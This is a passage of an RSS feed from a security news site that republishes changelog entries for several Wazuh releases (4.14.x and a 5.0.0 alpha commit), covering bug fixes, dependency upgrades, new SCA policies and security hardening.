<li>Fixed internal decoder RC startup. (<a href="https://github.com/wazuh/wazuh/pull/29663" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/29663/hovercard">#29663</a>)</li>
<li>Fixed queue stats RC over wazuh-analysisd. (<a href="https://github.com/wazuh/wazuh/pull/29673" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/29673/hovercard">#29673</a>)</li>
<li>Fixed race condition in the event queue. (<a href="https://github.com/wazuh/wazuh/pull/29672" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/29672/hovercard">#29672</a>)</li>
<li>Fixed regexCompile race condition. (<a href="https://github.com/wazuh/wazuh/pull/29699" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/29699/hovercard">#29699</a>)</li>
<li>Fixed malformed alerts in alerts.log when <code>&lt;group&gt;</code> contains newline characters. (<a href="https://github.com/wazuh/wazuh/pull/30653" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/30653/hovercard">#30653</a>)</li>
<li>Fixed and improved dpkg version comparison algorithm in Vulnerability Detector. (<a href="https://github.com/wazuh/wazuh/pull/31599" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/31599/hovercard">#31599</a>)</li>
</ul>
<h2>Changed</h2>
<ul>
<li>Improved databaseFeedManagerTesttool. (<a href="https://github.com/wazuh/wazuh/pull/30192" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/30192/hovercard">#30192</a>)</li>
<li>Adapted wazuh-maild to RFC5322 standard. (<a href="https://github.com/wazuh/wazuh/pull/30793" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/30793/hovercard">#30793</a>)</li>
<li>Enhanced the active response endpoint performance. (<a href="https://github.com/wazuh/wazuh/pull/31218" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/31218/hovercard">#31218</a>)</li>
</ul>
<h2>Agent</h2>
<h2>Added</h2>
<ul>
<li>Added support for parquet version 2 in AWS Wodle. (<a href="https://github.com/wazuh/wazuh/pull/30235" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/30235/hovercard">#30235</a>)</li>
<li>Added capability to do a hot configuration reload in Linux agents. (<a href="https://github.com/wazuh/wazuh/pull/30797" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/30797/hovercard">#30797</a>)</li>
<li>Added support for Amazon Inspector v2. (<a href="https://github.com/wazuh/wazuh/pull/31163" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/31163/hovercard">#31163</a>)</li>
<li>Added system users and groups to the inventory data. (<a href="https://github.com/wazuh/wazuh/pull/30369" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/30369/hovercard">#30369</a>)</li>
<li>Added browser extensions to the inventory data. (<a href="https://github.com/wazuh/wazuh-agent/issues/805" data-hovercard-type="issue" data-hovercard-url="/wazuh/wazuh-agent/issues/805/hovercard">#805</a>)</li>
<li>Added services to the inventory data. (<a href="https://github.com/wazuh/wazuh-agent/issues/807" data-hovercard-type="issue" data-hovercard-url="/wazuh/wazuh-agent/issues/807/hovercard">#807</a>)</li>
<li>Added missing AWS regions <code>us-gov-west-1</code> and <code>us-gov-east-1</code> to AWS wodle. (<a href="https://github.com/wazuh/wazuh/pull/31418" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/31418/hovercard">#31418</a>)</li>
<li>Included Windows kernel version information to IT Hygiene. (<a href="https://github.com/wazuh/wazuh/pull/32413" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/32413/hovercard">#32413</a>)</li>
</ul>
<h2>Fixed</h2>
<ul>
<li>Fixed errors with Azure Graph event fields. (<a href="https://github.com/wazuh/wazuh/pull/30831" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/30831/hovercard">#30831</a>)</li>
<li>Added the missing "provider" field to the whodata section in syscheckd JSON configuration. (<a href="https://github.com/wazuh/wazuh/pull/30877" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/30877/hovercard">#30877</a>)</li>
<li>Fixed journald disabled filters when both blocks have no filters. (<a href="https://github.com/wazuh/wazuh/pull/31700" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/31700/hovercard">#31700</a>)</li>
<li>Fixed whodata FIM compatibility with latest audit versions. (<a href="https://github.com/wazuh/wazuh/pull/30215" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/30215/hovercard">#30215</a>)</li>
<li>Fixed mismatch between MTU values in database and indexer for Windows agents. (<a href="https://github.com/wazuh/wazuh/pull/31875" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/31875/hovercard">#31875</a>)</li>
</ul>
<h2>Changed</h2>
<ul>
<li>Improved rootkit error messages to warnings due to future deprecation. (<a href="https://github.com/wazuh/wazuh/pull/31640" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/31640/hovercard">#31640</a>)</li>
</ul>
<h2>RESTful API</h2>
<h2>Added</h2>
<ul>
<li>Added syscollector users and groups endpoints. (<a href="https://github.com/wazuh/wazuh/pull/30913" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/30913/hovercard">#30913</a>)</li>
<li>Added syscollector services and browser_extension endpoints. (<a href="https://github.com/wazuh/wazuh/pull/31513" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/31513/hovercard">#31513</a>)</li>
</ul>
<h2>Fixed</h2>
<ul>
<li>Fixed secure headers. (<a href="https://github.com/wazuh/wazuh/pull/31046" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/31046/hovercard">#31046</a>)</li>
<li>Fixed the display of sensitive information for non-privileged users. (<a href="https://github.com/wazuh/wazuh/pull/31315" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/31315/hovercard">#31315</a>)</li>
</ul>
<h2>Ruleset</h2>
<h2>Added</h2>
<ul>
<li>Added SCA content for Rocky Linux 10. (<a href="https://github.com/wazuh/wazuh/pull/30745" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/30745/hovercard">#30745</a>)</li>
<li>Added SCA content for Debian 13. (<a href="https://github.com/wazuh/wazuh/pull/31747" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/31747/hovercard">#31747</a>)</li>
</ul>
<h2>Fixed</h2>
<ul>
<li>Fixed multiple Rocky Linux SCA checks generating incorrect results. (<a href="https://github.com/wazuh/wazuh/pull/29976" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/29976/hovercard">#29976</a>)</li>
<li>Fixed missing Check (2.3.7.6) in Windows Server 2019 v2.0.0. (<a href="https://github.com/wazuh/wazuh/pull/30173" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/30173/hovercard">#30173</a>)</li>
<li>Fixed camel casing in ownCloud ruleset header. (<a href="https://github.com/wazuh/wazuh/pull/30276" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/30276/hovercard">#30276</a>)</li>
<li>Fixed false positive in check 2.3.3.2 of macOS 13, 14, and 15 SCA. (<a href="https://github.com/wazuh/wazuh/pull/30489" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/30489/hovercard">#30489</a>)</li>
<li>Fixed bug in rule 92657. (<a href="https://github.com/wazuh/wazuh/pull/30529" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/30529/hovercard">#30529</a>)</li>
<li>Fixed field names in Office 365 rules. (<a href="https://github.com/wazuh/wazuh/pull/30528" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/30528/hovercard">#30528</a>)</li>
<li>Fixed action field in Fortigate rules. (<a href="https://github.com/wazuh/wazuh/pull/30515" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/30515/hovercard">#30515</a>)</li>
<li>Fixed Auditd EXECVE sibling Decoders. (<a href="https://github.com/wazuh/wazuh/pull/30612" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/30612/hovercard">#30612</a>)</li>
<li>Fixed problems with other Windows OS languages except English. (<a href="https://github.com/wazuh/wazuh/pull/31227" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/31227/hovercard">#31227</a>)</li>
<li>Reworked SCA Policy for Debian Linux 12. (<a href="https://github.com/wazuh/wazuh/pull/30717" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/30717/hovercard">#30717</a>)</li>
<li>Fixed missing comma in 0393-fortiauth_rules.xml. (<a href="https://github.com/wazuh/wazuh/pull/32025" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/32025/hovercard">#32025</a>)</li>
<li>Fixed Windows sca user account checks. (<a href="https://github.com/wazuh/wazuh/pull/32102" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/32102/hovercard">#32102</a>)</li>
<li>Fixed inaccuracies in Ubuntu 2404 sca policy. (<a href="https://github.com/wazuh/wazuh/pull/32106" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/32106/hovercard">#32106</a>)</li>
<li>Fixed incorrect service name in Ubuntu firewall service check. (<a href="https://github.com/wazuh/wazuh/pull/32143" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/32143/hovercard">#32143</a>)</li>
</ul>
<h2>Other</h2>
<h2>Changed</h2>
<ul>
<li>Updated <code>packaging</code> dependency to 25.0. (<a href="https://github.com/wazuh/wazuh/pull/31272" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/31272/hovercard">#31272</a>)</li>
<li>Updated <code>requests</code> to version 2.32.4. (<a href="https://github.com/wazuh/wazuh/pull/30536" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/30536/hovercard">#30536</a>)</li>
<li>Updated <code>urllib3</code> to version 2.5.0 and <code>protobuf</code> to version 5.29.5. (<a href="https://github.com/wazuh/wazuh/pull/30624" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/30624/hovercard">#30624</a>)</li>
<li>Upgraded Python embedded interpreter to 3.10.18. (<a href="https://github.com/wazuh/wazuh/pull/30916" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/30916/hovercard">#30916</a>)</li>
<li>Updated OpenSSL to 3.0.15 and cpp-httplib to v0.25.0. (<a href="https://github.com/wazuh/wazuh/pull/31779" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/31779/hovercard">#31779</a>)</li>
<li>Updated SQLite dependency to version 3.50.4. (<a href="https://github.com/wazuh/wazuh/issues/29586" data-hovercard-type="issue" data-hovercard-url="/wazuh/wazuh/issues/29586/hovercard">#29586</a>)</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[Wazuh v4.14.1]]></title>
<description><![CDATA[Manager
Added

Added IAM role support for VPC flow logs in the AWS wodle. (#32009)
Added support for static and temporary AWS credentials in the Amazon Security Lake subscriber. (#32514)

Changed

Optimized wazuh-db startup by executing agent schema creation in a single transaction. (#32401)
Impr...]]></description>
<link>https://tsecurity.de/de/3487870/it-security-tools/wazuh-v4141/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3487870/it-security-tools/wazuh-v4141/</guid>
<pubDate>Tue, 05 May 2026 02:20:26 +0200</pubDate>
<category>💾 IT Security Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>Manager</h2>
<h3>Added</h3>
<ul>
<li>Added IAM role support for VPC flow logs in the AWS wodle. (<a href="https://github.com/wazuh/wazuh/pull/32009" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/32009/hovercard">#32009</a>)</li>
<li>Added support for static and temporary AWS credentials in the Amazon Security Lake subscriber. (<a href="https://github.com/wazuh/wazuh/pull/32514" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/32514/hovercard">#32514</a>)</li>
</ul>
<h3>Changed</h3>
<ul>
<li>Optimized wazuh-db startup by executing agent schema creation in a single transaction. (<a href="https://github.com/wazuh/wazuh/pull/32401" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/32401/hovercard">#32401</a>)</li>
<li>Improved vulnerabilities index upgrade with hash-based mapping validation, automatic safe reindex, and backup cleanup. (<a href="https://github.com/wazuh/wazuh/pull/32463" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/32463/hovercard">#32463</a>)</li>
<li>Improved C++ logging mechanism to avoid unnecessary heap allocations. (<a href="https://github.com/wazuh/wazuh/pull/32069" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/32069/hovercard">#32069</a>)</li>
<li>Improved IndexerConnector error handling and response parsing to provide structured logging of 4xx/5xx errors. (<a href="https://github.com/wazuh/wazuh/pull/32521" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/32521/hovercard">#32521</a>)</li>
<li>Reduced default verbosity of wazuh-authd when handling invalid connections. (<a href="https://github.com/wazuh/wazuh/pull/32525" data-hovercard-type="issue" data-hovercard-url="/wazuh/wazuh/issues/32525/hovercard">#32525</a>)</li>
<li>Remoted now reads internal options at process startup. (<a href="https://github.com/wazuh/wazuh/pull/32697" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/32697/hovercard">#32697</a>)</li>
</ul>
<h3>Fixed</h3>
<ul>
<li>Fixed manager vulnerability scan not triggering due to incorrect syscollector event provider topic name. (<a href="https://github.com/wazuh/wazuh/pull/32045" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/32045/hovercard">#32045</a>)</li>
<li>Fixed IndexerConnector abuse control to prevent data loss on failed syncs. (<a href="https://github.com/wazuh/wazuh/pull/32787" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/32787/hovercard">#32787</a>)</li>
<li>Fixed user tag handling by adding 'user' as an alias for the 'dstuser' static field. (<a href="https://github.com/wazuh/wazuh/pull/32107" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/32107/hovercard">#32107</a>)</li>
<li>Fixed JSON validation issues in Analysisd and SCA components. (<a href="https://github.com/wazuh/wazuh/pull/32057" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/32057/hovercard">#32057</a>)</li>
<li>Fixed a bug in Vulnerability Scanner where the DB offset was updated even in error cases. (<a href="https://github.com/wazuh/wazuh/pull/32829" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/32829/hovercard">#32829</a>)</li>
</ul>
<h2>Agent</h2>
<h3>Added</h3>
<ul>
<li>Added support for Homebrew 2.0+ in IT Hygiene for macOS. (<a href="https://github.com/wazuh/wazuh/pull/32746" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/32746/hovercard">#32746</a>)</li>
</ul>
<h3>Changed</h3>
<ul>
<li>Changed how the fim_check_ignore function works in case of negative regex cases. (<a href="https://github.com/wazuh/wazuh/pull/31080" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/31080/hovercard">#31080</a>)</li>
<li>Changed how null values for hotfixes are handled in the Windows agent. (<a href="https://github.com/wazuh/wazuh/pull/31375" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/31375/hovercard">#31375</a>)</li>
<li>Improved service shutdown procedure. (<a href="https://github.com/wazuh/wazuh/pull/32874" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/32874/hovercard">#32874</a>)</li>
</ul>
<h3>Fixed</h3>
<ul>
<li>Fixed indefinite waiting in FIM whodata health check. (<a href="https://github.com/wazuh/wazuh/pull/32383" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/32383/hovercard">#32383</a>)</li>
<li>Fixed graceful shutdown in FIM. (<a href="https://github.com/wazuh/wazuh/pull/31241" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/31241/hovercard">#31241</a>)</li>
<li>SHA256 of commands is now verified on every execution. (<a href="https://github.com/wazuh/wazuh/pull/32049" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/32049/hovercard">#32049</a>)</li>
<li>Fixed duplicate <code>&lt;ca_store&gt;</code> configuration block during RPM package upgrades. (<a href="https://github.com/wazuh/wazuh/pull/32528" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/32528/hovercard">#32528</a>)</li>
<li>Fixed a bug that prevented overwriting <code>&lt;registry_limit&gt;</code> or <code>&lt;file_limit&gt;</code> options from remote configuration. (<a href="https://github.com/wazuh/wazuh/pull/31144" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/31144/hovercard">#31144</a>)</li>
<li>Fixed a bug in Logcollector that prevented following symlinks when resolving wildcarded files. (<a href="https://github.com/wazuh/wazuh/pull/29853" data-hovercard-type="issue" data-hovercard-url="/wazuh/wazuh/issues/29853/hovercard">#29853</a>)</li>
<li>Unified detection logs for wildcarded files in Logcollector. (<a href="https://github.com/wazuh/wazuh/pull/31222" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/31222/hovercard">#31222</a>)</li>
<li>Fixed a bug in FIM that did not recognize Registry keys unless they were UTF-8. (<a href="https://github.com/wazuh/wazuh/pull/32027" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/32027/hovercard">#32027</a>)</li>
<li>Fixed a bug in Logcollector that ignored all files with <code>&lt;age&gt;</code> filter on Windows. (<a href="https://github.com/wazuh/wazuh/pull/32731" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/32731/hovercard">#32731</a>)</li>
<li>Reverted IT Hygiene package vendor format on Debian: now includes name and email again. (<a href="https://github.com/wazuh/wazuh/pull/32812" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/32812/hovercard">#32812</a>)</li>
<li>Fixed a bug in IT Hygiene that reported duplicated Edge browser extensions. (<a href="https://github.com/wazuh/wazuh/pull/32785" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/32785/hovercard">#32785</a>)</li>
<li>Fixed reload of the <code>&lt;labels&gt;</code> block via remote configuration. (<a href="https://github.com/wazuh/wazuh/pull/32838" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/32838/hovercard">#32838</a>)</li>
<li>Fixed Windows installer to deploy SCA policies for Windows 2022 instead of Windows Server 2025. (<a href="https://github.com/wazuh/wazuh/pull/32836" data-hovercard-type="issue" data-hovercard-url="/wazuh/wazuh/issues/32836/hovercard">#32836</a>)</li>
</ul>
<h2>Ruleset</h2>
<h3>Changed</h3>
<ul>
<li>Reworked SCA Policy for Microsoft Windows 10 Enterprise. (<a href="https://github.com/wazuh/wazuh/pull/31449" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/31449/hovercard">#31449</a>)</li>
<li>Fixed bug in Windows SCA. (<a href="https://github.com/wazuh/wazuh/pull/31349" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/31349/hovercard">#31349</a>)</li>
<li>Fixed mistaken alert due to expected regex. (<a href="https://github.com/wazuh/wazuh/pull/31102" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/31102/hovercard">#31102</a>)</li>
<li>Fixed SCA checks in Oracle Linux 9. (<a href="https://github.com/wazuh/wazuh/pull/31886" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/31886/hovercard">#31886</a>)</li>
<li>Fixed bugs in Windows Server 2016 SCA. (<a href="https://github.com/wazuh/wazuh/pull/32509" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/32509/hovercard">#32509</a>)</li>
<li>Fixed bugs in PAM decoder. (<a href="https://github.com/wazuh/wazuh/pull/32523" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/32523/hovercard">#32523</a>)</li>
<li>Fixed MacOS Sequoia SCA scans with errors. (<a href="https://github.com/wazuh/wazuh/pull/32480" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/32480/hovercard">#32480</a>)</li>
<li>Windows Server 2016 SCA policy not configured correctly. (<a href="https://github.com/wazuh/wazuh/pull/32802" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/32802/hovercard">#32802</a>)</li>
</ul>
<h2>Other</h2>
<h3>Changed</h3>
<ul>
<li>Upgraded the <code>starlette</code> dependency to 0.47.2. (<a href="https://github.com/wazuh/wazuh/pull/31422" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/31422/hovercard">#31422</a>)</li>
<li>Upgraded Python embedded interpreter to 3.10.19. (<a href="https://github.com/wazuh/wazuh/pull/32782" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/32782/hovercard">#32782</a>)</li>
<li>Updated curl dependency to 8.12.1. (<a href="https://github.com/wazuh/wazuh/pull/32900" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/32900/hovercard">#32900</a>)</li>
<li>Updated LUA to version 5.4.6. (<a href="https://github.com/wazuh/wazuh/pull/32294" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/32294/hovercard">#32294</a>)</li>
<li>Updated libarchive to version 3.8.0. (<a href="https://github.com/wazuh/wazuh/pull/32294" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/32294/hovercard">#32294</a>)</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[v5.0.0-alpha0: Merge pull request #33593 from wazuh/bug/32387-Analyze_TSAN]]></title>
<description><![CDATA[ThreadSanitizer SEGV Fix: Race Condition]]></description>
<link>https://tsecurity.de/de/3487859/it-security-tools/v500-alpha0-merge-pull-request-33593-from-wazuhbug32387-analyzetsan/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3487859/it-security-tools/v500-alpha0-merge-pull-request-33593-from-wazuhbug32387-analyzetsan/</guid>
<pubDate>Tue, 05 May 2026 02:20:11 +0200</pubDate>
<category>💾 IT Security Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>ThreadSanitizer SEGV Fix: Race Condition</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Wazuh v4.14.2]]></title>
<description><![CDATA[Manager
Fixed

Prevented Azure Log Analytics bookmarks from being overwritten across similar configurations. (#33046)
Fixed discrepancy in the API certificate files. (#33330)
Made analysisd ruleset reload endpoints fully asynchronous to avoid blocking the API event loop. (#33589)
Improved analysi...]]></description>
<link>https://tsecurity.de/de/3487854/it-security-tools/wazuh-v4142/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3487854/it-security-tools/wazuh-v4142/</guid>
<pubDate>Tue, 05 May 2026 02:20:04 +0200</pubDate>
<category>💾 IT Security Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>Manager</h2>
<h3>Fixed</h3>
<ul>
<li>Prevented Azure Log Analytics bookmarks from being overwritten across similar configurations. (<a href="https://github.com/wazuh/wazuh/pull/33046" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/33046/hovercard">#33046</a>)</li>
<li>Fixed discrepancy in the API certificate files. (<a href="https://github.com/wazuh/wazuh/pull/33330" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/33330/hovercard">#33330</a>)</li>
<li>Made analysisd ruleset reload endpoints fully asynchronous to avoid blocking the API event loop. (<a href="https://github.com/wazuh/wazuh/pull/33589" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/33589/hovercard">#33589</a>)</li>
<li>Improved analysisd ruleset hot reload performance. (<a href="https://github.com/wazuh/wazuh/pull/33580" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/33580/hovercard">#33580</a>)</li>
<li>Avoided using <code>systemctl</code> in restart scripts when systemd is not running as PID 1. (<a href="https://github.com/wazuh/wazuh/pull/33602" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/33602/hovercard">#33602</a>)</li>
</ul>
<h2>Agent</h2>
<h3>Added</h3>
<ul>
<li>Added detection of the <code>-a never,task</code> Audit rule in FIM whodata for Linux. (<a href="https://github.com/wazuh/wazuh/pull/33313" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/33313/hovercard">#33313</a>)</li>
</ul>
<h3>Fixed</h3>
<ul>
<li>Fixed Windows agent remote upgrade (WPK) when installed in a custom directory. (<a href="https://github.com/wazuh/wazuh/pull/33171" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/33171/hovercard">#33171</a>)</li>
<li>Fixed a package issue causing upgrades to fail when the <code>shared</code> directory contained subdirectories. (<a href="https://github.com/wazuh/wazuh/pull/33182" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/33182/hovercard">#33182</a>)</li>
<li>Fixed FIM issue preventing whodata from working on systems with <code>/var</code> and <code>/etc</code> mounted on different volumes. (<a href="https://github.com/wazuh/wazuh/pull/33270" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/33270/hovercard">#33270</a>)</li>
<li>Optimized user and group inventory performance in Syscollector on Windows Domain Controllers. (<a href="https://github.com/wazuh/wazuh/pull/33322" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/33322/hovercard">#33322</a>)</li>
<li>Fixed an agent bug that prevented directories from being received in the remote configuration. (<a href="https://github.com/wazuh/wazuh/pull/33227" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/33227/hovercard">#33227</a>)</li>
<li>Silenced agent log message about failing to connect to Active Response when it is disabled. (<a href="https://github.com/wazuh/wazuh/pull/33343" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/33343/hovercard">#33343</a>)</li>
</ul>
<h2>Ruleset</h2>
<h3>Added</h3>
<ul>
<li>Added SCA Policy for Microsoft Windows Server 2025. (<a href="https://github.com/wazuh/wazuh/pull/32856" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/32856/hovercard">#32856</a>)</li>
</ul>
<h3>Changed</h3>
<ul>
<li>Fixed bug in multiple macOS SCA checks. (<a href="https://github.com/wazuh/wazuh/pull/33202" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/33202/hovercard">#33202</a>)</li>
</ul>
<h3>Fixed</h3>
<ul>
<li>Fixed indentation issue in the SCA policy for Windows 10 Enterprise that prevented its execution. (<a href="https://github.com/wazuh/wazuh/pull/33361" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/33361/hovercard">#33361</a>)</li>
</ul>
<h2>Other</h2>
<h3>Changed</h3>
<ul>
<li>Upgraded the <code>starlette</code> dependency to 0.49.1. (<a href="https://github.com/wazuh/wazuh/pull/33069" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/33069/hovercard">#33069</a>)</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[Wazuh v4.14.3]]></title>
<description><![CDATA[Manager
Fixed

Scaped document ID when necessary before sending document to indexer. (#33464)
Extended timestamp conversion helpers to support additional input formats and normalize ISO8601 strings. (#33551)
Restricted cluster file transfer write paths. (#33705)
Hardened cluster deserialization b...]]></description>
<link>https://tsecurity.de/de/3487843/it-security-tools/wazuh-v4143/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3487843/it-security-tools/wazuh-v4143/</guid>
<pubDate>Tue, 05 May 2026 02:19:48 +0200</pubDate>
<category>💾 IT Security Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>Manager</h2>
<h3>Fixed</h3>
<ul>
<li>Scaped document ID when necessary before sending document to indexer. (<a href="https://github.com/wazuh/wazuh/pull/33464" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/33464/hovercard">#33464</a>)</li>
<li>Extended timestamp conversion helpers to support additional input formats and normalize ISO8601 strings. (<a href="https://github.com/wazuh/wazuh/pull/33551" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/33551/hovercard">#33551</a>)</li>
<li>Restricted cluster file transfer write paths. (<a href="https://github.com/wazuh/wazuh/pull/33705" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/33705/hovercard">#33705</a>)</li>
<li>Hardened cluster deserialization by restricting callable decoding to Wazuh modules and improving error handling. (<a href="https://github.com/wazuh/wazuh/pull/33910" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/33910/hovercard">#33910</a>)</li>
<li>Added query size checks for syscollector delta sync SQL generation to prevent buffer overflows. (<a href="https://github.com/wazuh/wazuh/pull/33803" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/33803/hovercard">#33803</a>)</li>
<li>Replaced unsafe <code>sprintf</code> calls in the SCA decoder to prevent buffer overflows. (<a href="https://github.com/wazuh/wazuh/pull/33756" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/33756/hovercard">#33756</a>)</li>
<li>Fixed a memory leak in the CIS-CAT decoder when database operations fail. (<a href="https://github.com/wazuh/wazuh/pull/33739" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/33739/hovercard">#33739</a>)</li>
<li>Fixed ruleset hot reload on workers by awaiting <code>send_reload_ruleset_msg</code>. (<a href="https://github.com/wazuh/wazuh/pull/34184" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/34184/hovercard">#34184</a>)</li>
</ul>
